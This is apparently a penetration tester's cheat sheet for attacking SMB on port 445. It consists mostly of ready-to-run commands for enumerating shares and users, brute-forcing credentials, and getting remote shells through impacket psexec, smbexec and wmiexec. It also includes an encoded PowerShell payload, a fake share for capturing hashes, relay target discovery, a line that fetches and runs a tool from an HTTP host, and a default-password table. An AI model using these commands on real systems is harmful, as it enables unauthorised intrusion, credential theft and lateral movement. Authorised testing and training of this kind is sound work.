SMB ( 445 )

Resources

• SMB Deep Dive
  • By geeksforgeeks : https://www.geeksforgeeks.org/linux-unix/linux-setfacl-command-with-example/
  • Configrations : https://www.samba.org/samba/docs/current/man-html/smb.conf.5.html
• Exploitation
  • By sud0ru : https://sud0ru.ghost.io/what-makes-anonymous-pipes/

Cheat sheet

• By secybr : https://secybr.com/posts/smb-pentesting-best-practices/
• By snovvcra : https://ppn.snovvcra.sh/pentest/infrastructure/ad/smb#smb-share-with-null-authentication

Commands

• Host Discovery
  • Find hosts with NetBIOS enabled on a subnet.

    nbtscan -r 192.168.8.0/24

• Version Scanning
  • Use Metasploit to discover the SMB version. (Can be inaccurate).

    msf > use auxiliary/scanner/smb/smb_version
    

  • Use NetExec (nxc) for reliable version and info gathering.

    nxc smb 192.168.8.166

  • Use Nmap to discover supported SMB dialects/versions.

    nmap -sV -p445 --script smb-protocols 192.168.8.166

• Share Enumeration
  • List shares with smbclient (null session).

    smbclient -L 192.168.8.166 -N

  • List shares with smbclient (with credentials).

    smbclient -L 192.168.8.166 -U 'fady%321'

  • Use smbmap to list shares and permissions.

    smbmap -u fady -p 321 -H 192.168.8.166

  • Use nullinux to enumerate shares and users.

    nullinux -users 192.168.8.166 -shares

• Comprehensive Enumeration
  • Use enum4linux for extensive SMB enumeration (users, groups, shares, policies).

    enum4linux -a -u "fady" -p "321" 192.168.8.166

  • Use the next-generation enum4linux-ng.

    enum4linux-ng -A -u 'fady' -p '321' 192.168.8.166

• Nmap Scripting Engine (NSE)
  • Run all “safe” enumeration scripts.

    nmap --script "safe or smb-enum-*" -p 445 192.168.8.166

  • Perform OS discovery (unsafe script).

    nmap -sV --script-args=unsafe=1 --script smb-os-discovery 192.168.8.166 -p139,445

  • Scan for known vulnerabilities.

    nmap -n -Pn -sV --script 'smb-vuln*' 192.168.8.166 -p445

• RPC Enumeration
  • Connect to RPC with a null session.

    rpcclient -U "" -N 192.168.8.166

  • Connect to RPC with credentials.

    rpcclient -U "fady%321" 192.168.8.166

  • Dump user info and SIDs with impacket-samrdump.

    impacket-samrdump -port 445 fady:'321'@192.168.8.166
    impacket-samrdump -port 139 fady:'321'@192.168.8.166

  • Dump RPC endpoint information.

    impacket-rpcdump -port 135 fady:'321'@192.168.8.166

• NetBIOS Name Lookup
  • Get NetBIOS names from an IP.

    nmblookup -A 192.168.8.166

• Credential Brute-Forcing
  • Use Metasploit.

    msf> use auxiliary/scanner/smb/smb_login
    

  • Use Hydra (works best with SMBv1).

    hydra -L users -P pass.txt 192.168.8.166 smb

  • Use Nmap’s brute script.

    nmap -p 445 --script=smb-brute --script-args userdb=users,passdb=pass.txt,smblockout=1 192.168.8.166

  • Use NetExec (nxc) for modern, reliable brute-forcing.

    nxc smb 192.168.8.166 -u users -p pass.txt --continue-on-success

• Share Interaction
  • Connect to a share with smbclient.

    smbclient \\\\192.168.8.166\\sharing -U "anonymous%anonymous"

    smb: \> prompt (Turn off interactive prompts) smb: \> recurse (Enable recursion for mget) smb: \> mget * (Download all files)

  • Download files recursively with smbget.

    smbget smb://192.168.8.166/sharing -U "anonymous%anonymous" --recursive

  • Mount a remote share on Linux.

    mount -t cifs '//192.168.8.166/sharing' ./smb -v -o user=fady,pass='321'

  • Map a network drive on Windows.

    net use T: \\10.10.x.x\SharedFolder Password123! /user:secybr.local\0xhav0c /savecred /p:no

• Remote Code Execution
  • Use impacket-smbexec to get a semi-interactive shell.

    impacket-smbexec 'ubuntu:123@192.168.8.166' -share sharing

  • Use impacket-psexec for a more stable shell.

    impacket-psexec 'fady:321@192.168.8.166'

  • Use impacket-wmiexec for a shell via WMI.

    impacket-wmiexec 'fady:321@192.168.8.166'

  • Execute commands via smbmap.

    smbmap -u fady -p 321 -H 192.168.8.166 -x 'powershell -e JABjAGwAaQ....'

• Creating a Malicious Share
  • Use impacket-smbserver to host a fake share for capturing hashes or serving payloads.

    impacket-smbserver shareme ./smb/ -comment 'Fake Share' -smb2support

• NTLM Relay Reconnaissance
  • Identify hosts without SMB Signing enabled.

    nxc smb 192.168.56.10-23 --gen-relay-list smb_relay.txt

• Sniffing Samba Version
  • Use ngrep to passively sniff the Samba version during a connection attempt.

    sudo ngrep -i -d eth0 's.?a.?m.?b.?a.*[[:digit:]]' & smbclient -L //192.168.8.166 -U "anonymous%anonymous" -d 100 > /dev/null 2>&1

• List Shared Printers
  • Use net view on Windows to discover shared resources, including printers.

    net view \\10.10.x.x

  • Use an Nmap script to attempt printing text to a shared printer.

    nmap -sV -p445 --script=smb-print-text

• Create an SMB share allowing null authentication.

  # Linux /etc/samba/smb.conf
  [ global]
  map to guest = bad user
  server role = standalone server
  usershare allow guests = yes
  smb ports = 445
  [smb]
  comment = Samba
  path = /srv/smb
  guest ok = yes
  read only = no
  browsable = yes
  force user = nobody
   
  sudo service smbd restart
  sudo chown -R nobody:root /srv/smb/
  sudo chmod -R 777 /srv/smb/
   
   
  # Windows {https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer}
   
  PS > mkdir C:\share
  PS > icacls C:\share\ /T /grant Anonymous` logon:r
  PS > icacls C:\share\ /T /grant Everyone:r
  PS > New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
  PS > REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f  # this will overwrite existing NullSessionPipes\
  PS > REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
  PS > REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
  PS > REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f

• Different tools

  manspider 192.168.0.0/24 -f passw user admin account network login logon cred -d evilcorp -u bob -p Passw0rd
   
  Snaffler.exe -o C:\Users\helen\Desktop\log.txt -s -c DC01.inlanefreight.local
  .\Snaffler.exe -s -o snaffer.log
  .\loader.exe -path "http://192.168.99.22/exe/Snaffler.exe" -args " -s " # best of the best

• Tips & Tricks

  # Collect listing of files with size < 10 Mb:
  PS > cd \\megacorp.local\share 
  PS > Get-ChildItem -Recurse -File | ? {$_.Length -lt 10MB } | select -ExpandProperty FullName | Out-File share.txt

Tools

• Invoke-BuildAnonymousSMBServer : https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer
• snaffler : https://github.com/SnaffCon/Snaffler
• manspider : https://github.com/blacklanternsecurity/MANSPIDER
• smbeagle : https://github.com/punk-security/SMBeagle

Field Notes & Theory

A Guide to SMB Versions

SMB v1 (SMB1) - The Legacy Protocol

The original SMB version. SMB1 began in the 1980s and has gone through multiple iterations. In Windows 95, Microsoft introduced CIFS as a way to implement SMB1.

Insecure & Inefficient NOT use SMB v1 because it is insecure (no encryption, has been exploited in attacks like WannaCry and NotPetya) and inefficient (very “chatty” on networks creating congestion and reduced performance).

In modern applications, you should

SMB v2 (SMB2) - The Modern Standard

SMB2 was introduced with Windows Vista. This version of SMB had significant improvements in performance and simplicity when compared to SMB1. Additionally, SMBv2 offered security enhancements. For example, SMB2.0.2 introduced pre-authentication integrity and SMB2 is not vulnerable to the same WannaCry and NotPetya exploits that make SMB1 a security risk. SMB v2.1 was introduced with Windows 7 and Server 2008 R2, further improving performance and oplocks (opportunistic locking).

SMB v3 (SMB3) - The Secure Choice

SMB3 which introduced end-to-end SMB encryption and later are the most advanced and secure implementations of SMB. The first release of SMB3 (a.k.a. SMB v3.0) came with Windows 8 and Server 2012. SMB v3.02 was introduced in Windows 8.1 and Server 2012 R2. SMB 3.1.1 the latest SMB protocol was introduced with Windows 10 and Server 2016.

INFO

By default, modern implementations of SMB use TCP port 445 as the SMB port. Older SMB implementations (pre-Windows 2000) used SMB port 139,137,138.

Common Default Credentials

Usernames	Common Passwords
(blank)	(blank)
guest	(blank)
Administrator, admin	(blank), password, administrator, admin
arcserve	arcserve, backup
tivoli, tmersrvd	tivoli, tmersrvd, admin
backupexec, backup	backupexec, backup, arcada
test, lab, demo	password, test, lab, demo

Nodes

• SMB-C